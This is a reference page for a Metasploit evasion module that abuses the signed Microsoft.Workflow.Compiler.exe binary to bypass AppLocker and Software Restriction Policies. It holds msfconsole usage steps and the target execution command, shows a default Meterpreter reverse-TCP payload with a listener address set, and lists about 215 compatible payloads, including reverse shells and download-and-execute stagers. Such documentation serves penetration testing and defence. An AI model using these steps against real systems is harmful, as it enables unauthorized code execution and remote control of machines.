Applocker Evasion - Microsoft Workflow Compiler - Metasploit
This page contains detailed information about how to use the evasion/windows/applocker_evasion_workflow_compiler metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Applocker Evasion - Microsoft Workflow Compiler
Module: evasion/windows/applocker_evasion_workflow_compiler
Source code: modules/evasion/windows/applocker_evasion_workflow_compiler.rb
Disclosure date: -
Last modification time: 2019-08-08 18:48:10 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binaries Microsoft.Workflow.Compiler.exe to execute user supplied code.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use evasion/windows/applocker_evasion_workflow_compiler
msf evasion(applocker_evasion_workflow_compiler) > show options
... show and set options ...
msf evasion(applocker_evasion_workflow_compiler) > exploit
Knowledge Base
Introduction
This module is designed to evade solutions such as software restriction policies and Applocker. Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" The main vector for this bypass is to use the trusted binary Microsoft.Workflow.Compiler.exe to execute user supplied code as this binary is located within the trusted Windows directory.
Vulnerable Application
This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block Microsoft.Workflow.Compiler.exe or the "Microsoft.Net" directory.
Options
- XOML_FILE - Filename for the evasive file (default: workflow.xoml).
- XML_FILE - Filename for the .snk file (default: workflow.xml).
Verification Steps
- Start
msfconsole
- Do:
use evasion/windows/applocker_evasion_workflow_compiler
- Do:
set PAYLOAD <payload>
- Do:
run
- The module will now display instructions of how to proceed
[+] workflow.xoml stored at /root/.msf4/local/workflow.xoml
[+] workflow.xml stored at /root/.msf4/local/workflow.xml
[*] Copy workflow.xoml and workflow.xml to the target
[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\Microsoft.Workflow.Compiler.exe workflow.xml GQi
replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
References
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
Go back to menu.
Msfconsole Usage
Here is how the windows/applocker_evasion_workflow_compiler evasion module looks in the msfconsole:
msf6 > use evasion/windows/applocker_evasion_workflow_compiler
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show info
Name: Applocker Evasion - Microsoft Workflow Compiler
Module: evasion/windows/applocker_evasion_workflow_compiler
Platform: Windows
Arch: x86, x64
Privileged: No
License: MSF_LICENSE
Rank: Normal
Provided by:
Nick Tyrer <@NickTyrer>
Matt Graeber
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
XML_FILE workflow.xml yes Filename for the .xml file (default: workflow.xml)
XOML_FILE workflow.xoml yes Filename for the .xoml file (default: workflow.xoml)
Description:
This module will assist you in evading Microsoft Windows Applocker
and Software Restriction Policies. This technique utilises the
Microsoft signed binaries Microsoft.Workflow.Compiler.exe to execute
user supplied code.
References:
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
Module Options
This is a complete list of options available in the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show options
Module options (evasion/windows/applocker_evasion_workflow_compiler):
Name Current Setting Required Description
---- --------------- -------- -----------
XML_FILE workflow.xml yes Filename for the .xml file (default: workflow.xml)
XOML_FILE workflow.xoml yes Filename for the .xoml file (default: workflow.xoml)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.3 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Evasion target:
Id Name
-- ----
0 Microsoft Windows
Advanced Options
Here is a complete list of advanced options supported by the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show advanced
Module advanced options (evasion/windows/applocker_evasion_workflow_compiler):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Evasion Targets
Here is a list of targets (platforms and systems) supported by the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show targets
Evasion targets:
Id Name
-- ----
0 Microsoft Windows
Compatible Payloads
This is a list of possible payloads which are compatible with the windows/applocker_evasion_workflow_compiler evasion module:
msf6 evasion(windows/applocker_evasion_workflow_compiler) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/windows/dllinject/bind_hidden_ipknock_tcp normal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
6 payload/windows/dllinject/bind_hidden_tcp normal No Reflective DLL Injection, Hidden Bind TCP Stager
7 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
8 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
9 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
10 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
11 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
12 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
13 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
14 payload/windows/dllinject/find_tag normal No Reflective DLL Injection, Find Tag Ordinal Stager
15 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
16 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
17 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
18 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
19 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
20 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
21 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
22 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
23 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
24 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
25 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
26 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
27 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
28 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
29 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
30 payload/windows/exec normal No Windows Execute Command
31 payload/windows/loadlibrary normal No Windows LoadLibrary Path
32 payload/windows/messagebox normal No Windows MessageBox
33 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
34 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
35 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
36 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
37 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
38 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
39 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
40 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
41 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
42 payload/windows/meterpreter/find_tag normal No Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
43 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
44 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
45 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
46 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
47 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
48 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
49 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
50 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
51 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
52 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
53 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
54 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
55 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
56 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
57 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
58 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
59 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
60 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
61 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
62 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
63 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
64 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
65 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
66 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
67 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
68 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
69 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
70 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
71 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
72 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
73 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
74 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
75 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
76 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
77 payload/windows/patchupdllinject/find_tag normal No Windows Inject DLL, Find Tag Ordinal Stager
78 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
79 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
80 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
81 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
82 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
83 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
84 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
85 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
86 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
87 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
88 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
89 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
90 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
91 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
92 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
93 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
94 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
95 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
96 payload/windows/patchupmeterpreter/find_tag normal No Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager
97 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
98 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
99 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
100 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
101 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
102 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
103 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
104 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
105 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
106 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
107 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
108 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
109 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
110 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
111 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
112 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
113 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
114 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
115 payload/windows/peinject/find_tag normal No Windows Inject PE Files, Find Tag Ordinal Stager
116 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
117 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
118 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
119 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
120 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
121 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
122 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
123 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
124 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
125 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
126 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
127 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
128 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
129 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
130 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
131 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
132 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
133 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
134 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
135 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
136 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
137 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
138 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
139 payload/windows/shell/find_tag normal No Windows Command Shell, Find Tag Ordinal Stager
140 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
141 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
142 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
143 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
144 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
145 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
146 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
147 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
148 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
149 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
150 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
151 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
152 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
153 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
154 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
155 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
156 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
157 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
158 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
159 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
160 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
161 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
162 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
163 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
164 payload/windows/upexec/find_tag normal No Windows Upload/Execute, Find Tag Ordinal Stager
165 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
166 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
167 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
168 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
169 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
170 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
171 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
172 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
173 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
174 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
175 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
176 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
177 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
178 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
179 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
180 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
181 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
182 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
183 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
184 payload/windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager
185 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
186 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
187 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
188 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
189 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
190 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
191 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
192 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
193 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
194 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
195 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
196 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
197 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
198 payload/windows/x64/exec normal No Windows x64 Execute Command
199 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
200 payload/windows/x64/messagebox normal No Windows MessageBox x64
201 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
202 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
203 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
204 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
205 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
206 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
207 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
208 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
209 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
210 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
211 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
212 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
213 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
214 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
